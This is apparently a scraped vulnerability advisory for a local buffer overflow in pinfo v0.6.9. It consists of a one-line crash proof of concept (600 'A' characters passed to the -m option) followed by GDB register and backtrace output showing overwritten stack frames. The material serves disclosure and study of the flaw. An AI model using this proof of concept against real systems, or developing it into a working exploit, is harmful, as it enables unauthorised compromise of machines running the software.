扫码分享
验证:
体验盒子# Title: pinfo v0.6.9 - Local Buffer Overflow
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N/A
# Download #
$ apt-get install pinfo
# POC #
For any Question or discussion about this vuln: https://www.facebook.com/asrirnassim/
$ pinfo -m `python -c 'print "A"*600'`
Przemek's Info Viewer v0.6.9
Looking for man page...
Caught signal 11, bye!
Segmentation fault
# GDB Output #
$ gdb pinfo
(gdb) r -m `python -c 'print "A"*600'`
Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
84 getenv.c: No such file or directory.
(gdb) info registers
rax0x54 84
rbx0x4141414141414141 4702111234474983745 <====
rcx0x1a8 424
rdx0x10 16
rsi0x7fffffffdaae 140737488345774
rdi0x7ffff79831a8 140737347334568
rbp0x7fffffffe0a8 0x7fffffffe0a8
rsp0x7fffffffda90 0x7fffffffda90
r8 0x0 0
r9 0x20 32
r100x1ec 492
r110x7ffff796c630 140737347241520
r120x4554 17748
r130x4 4
r140x2 2
r150x7ffff79831aa 140737347334570
rip0x7ffff73c911d 0x7ffff73c911d <__GI_getenv+173>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) where
#0__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
#10x00007ffff796c661 in initscr () from /lib/x86_64-linux-gnu/libncursesw.so.5
#20x000055555556214a in ?? ()
#30x000055555555f165 in ?? ()
#40x0000555555557552 in ?? ()
#50x4141414141414141 in ?? ()
#60x4141414141414141 in ?? ()
#70x4141414141414141 in ?? ()
#80x4141414141414141 in ?? ()
#90x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x4141414141414141 in ?? ()
#18 0x4141414141414141 in ?? ()
#19 0x4141414141414141 in ?? ()
#20 0x4141414141414141 in ?? ()
#21 0x4141414141414141 in ?? ()
#22 0x4141414141414141 in ?? ()
#23 0x4141414141414141 in ?? ()
#24 0x4141414141414141 in ?? ()
#25 0x4141414141414141 in ?? ()
#26 0x4141414141414141 in ?? ()
#27 0x4141414141414141 in ?? ()
#28 0x4141414141414141 in ?? ()
#29 0x4141414141414141 in ?? ()
#30 0x4141414141414141 in ?? ()
#31 0x4141414141414141 in ?? ()
#32 0x4141414141414141 in ?? ()
#33 0x4141414141414141 in ?? ()
#34 0x4141414141414141 in ?? ()
#35 0x4141414141414141 in ?? ()
#36 0x4141414141414141 in ?? ()
#37 0x4141414141414141 in ?? ()
#38 0x4141414141414141 in ?? ()
#39 0x4141414141414141 in ?? ()
#40 0x4141414141414141 in ?? ()
#41 0x00007fffffff0020 in ?? ()
#42 0x00007fffffffebaa in ?? ()
---Type <return> to continue, or q <return> to quit---
#43 0x00007fffffffebc2 in ?? ()
#44 0x00007fffffffebd6 in ?? ()
#45 0x00007fffffffebe1 in ?? ()
#46 0x00007fffffffec07 in ?? ()
#47 0x00007fffffffec18 in ?? ()
#48 0x00007fffffffec48 in ?? ()
#49 0x00007fffffffec52 in ?? ()
#50 0x00007fffffffec73 in ?? ()
#51 0x00007fffffffec7d in ?? ()
#52 0x00007fffffffec86 in ?? ()
#53 0x00007fffffffec91 in ?? ()
#54 0x00007fffffffeca4 in ?? ()
#55 0x00007fffffffecb7 in ?? ()
#56 0x00007fffffffeccc in ?? ()
#57 0x00007fffffffed08 in ?? ()
#58 0x00007fffffffed33 in ?? ()
#59 0x00007fffffffed58 in ?? ()
#60 0x00007fffffffed63 in ?? ()
#61 0x00007fffffffed74 in ?? ()
#62 0x00007fffffffed84 in ?? ()
#63 0x00007fffffffed8f in ?? ()
#64 0x00007fffffffedc3 in ?? ()
#65 0x00007fffffffeddc in ?? ()
#66 0x00007fffffffee0d in ?? ()
#67 0x00007fffffffee30 in ?? ()
#68 0x00007fffffffee3f in ?? ()
#69 0x00007fffffffee47 in ?? ()
#70 0x00007fffffffee59 in ?? ()
#71 0x00007fffffffee75 in ?? ()
#72 0x00007fffffffee82 in ?? ()
#73 0x00007fffffffeeb5 in ?? ()
#74 0x00007fffffffeed1 in ?? ()
#75 0x00007fffffffeeee in ?? ()
#76 0x00007fffffffef28 in ?? ()
#77 0x00007fffffffef97 in ?? ()
#78 0x0000000000000000 in ?? ()
体验盒子
